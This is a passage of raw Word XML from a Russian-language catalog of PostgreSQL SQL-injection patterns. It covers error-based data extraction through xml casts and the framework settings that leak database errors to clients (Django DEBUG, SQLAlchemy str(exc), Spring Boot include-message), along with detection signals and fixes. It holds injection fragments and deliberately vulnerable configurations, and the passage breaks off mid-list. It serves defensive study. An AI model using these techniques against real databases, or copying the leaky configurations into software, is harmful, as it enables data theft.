          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>login = 'admin user'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, сконструированный XML </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;admin user&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> некорректен (пробел в имени тега), и PG бросает:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287298E6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ERROR: invalid XML content</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F606594" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DETAIL: line 1: error parsing attribute name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4025B72E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;admin user&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F14671"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202811A7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">В тексте </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DETAIL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> присутствует фрагмент исходного XML.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C39FAC7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что произойдёт.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Канал работает, но не всегда: формат сообщения зависит от версии libxml2, не от PG. На некоторых сборках </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DETAIL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> усекается, на других не возвращается клиенту вообще.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17567D3C"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xml_in()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> парсит вход через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>xmlReadMemory()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> из libxml2. При ошибке парсинга libxml2 формирует структуру </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>xmlError</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, из которой PG копирует фрагмент в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DETAIL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ошибки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0F3193" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Требования к среде.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PostgreSQL, собранный с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--with-libxml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (стандартная сборка на большинстве дистрибутивов). Канал доставки ошибки с полем </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DETAIL</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DEDB8E2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Как выглядит легитимное использование.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Cast к </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>xml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> встречается в приложениях, работающих с XML-данными — SOAP-интеграции, документообо́рот.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DA7FE8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Конкретные сигналы атаки:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3069BDE6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cast к </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>xml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> строки, собранной через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>||</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> из подзапроса. Легитимный код кастит уже валидный XML.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A6F97E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Конструкции </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'&lt;' || expr || '&gt;'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — индикатор намеренной попытки сломать парсер на пробельных или специальных символах.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17BE47EB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Версии.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Все поддерживаемые версии PG со сборкой </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--with-libxml</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D9C07C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Связанные паттерны.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 3.2.1, 3.11.3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BA4524" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Источники.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HackTricks: PostgreSQL injection — XML based; PostgreSQL Documentation: XML Functions, Data Type — xml.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FB45BA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.2.5 Каналы пробрасывания ошибки до атакующего</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FAECDA2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Суть.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Все четыре предыдущих паттерна (3.2.1–3.2.4) бесполезны, если текст ошибки PG не доходит до атакующего. На сервере ошибка всегда генерируется и попадает в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>postgresql.log</w:t>
      </w:r>
      <w:r>
        <w:t>; вопрос — как и сколько из неё попадёт в HTTP-ответ. Этот подраздел не про SQL, а про конфигурацию приложения и фреймворков.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60138A41" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Канал 1: Django при `DEBUG=True`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68ABC79D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># settings.py — уязвимая конфигурация</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2115B05F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DEBUG = True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581BFA49" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ALLOWED_HOSTS = ['*']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445DB130" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">При </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DEBUG=True</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> любой необработанный exception проходит через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>technical_500_response()</w:t>
      </w:r>
      <w:r>
        <w:t>, который рендерит HTML-страницу с полным traceback, текстом DB-исключения и оригинальным SQL-запросом.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59636324" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Канал 2: SQLAlchemy `DBAPIError` в ответе</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54DF3AB6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># Антипаттерн — текст исключения уходит в ответ клиенту</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DC41C5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D3DA64"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286DEE2B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>except DBAPIError as exc:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C56B82C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return {"error": str(exc)}, 500   # ← полный текст PG-ошибки + SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E42D93" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DBAPIError.__str__()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> включает оригинальный текст ошибки PG (с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;value&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> внутри) и оригинальный SQL-запрос. Особенно опасно в API, отдающих структурированные ошибки клиенту: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{"error": str(exc)}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — типичная конструкция, которую разработчики копируют из туториалов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB54614" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Канал 3: Spring Boot `server.error.include-message=always`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4E59C4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># application.yml — уязвимая конфигурация Spring Boot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED66847" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326B4ED9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  error:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59BCB9C4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    include-message: always</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382F735D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    include-stacktrace: always</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F69847D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">При </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>include-message=always</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> поле </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>message</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в JSON-ответе </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>BasicErrorController</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> содержит текст исключения, включая </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SQLException.getMessage()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> от JDBC-драйвера, что для pgjdbc даёт полный PG error message с embedded value. Дефолт в Spring Boot 2.3+ — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>never</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0C70BF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Когда канала нет</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4E3837" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Если все три закрыты — error-based extraction в форме 3.2.1, 3.2.2, 3.2.4 не работает. Остаётся:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CF4DE1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>3.2.3 (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CASE WHEN ... 1/0</w:t>
      </w:r>
      <w:r>
        <w:t>) — нужен только различимый HTTP-status, не текст.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EB778B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>3.3 (boolean-blind) — то же самое, ещё надёжнее.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44560249" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>3.4 (time-based) — если даже HTTP-status одинаков.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A28EDA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Как выглядит легитимное использование / правильный паттерн.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Все три канала ошибочно ставятся в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>always</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или включаются для отладки и забываются. Правильно:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214EFCFE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Django: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DEBUG = False</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в продакшене, кастомные </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>500.html</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>404.html</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4C4DCC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
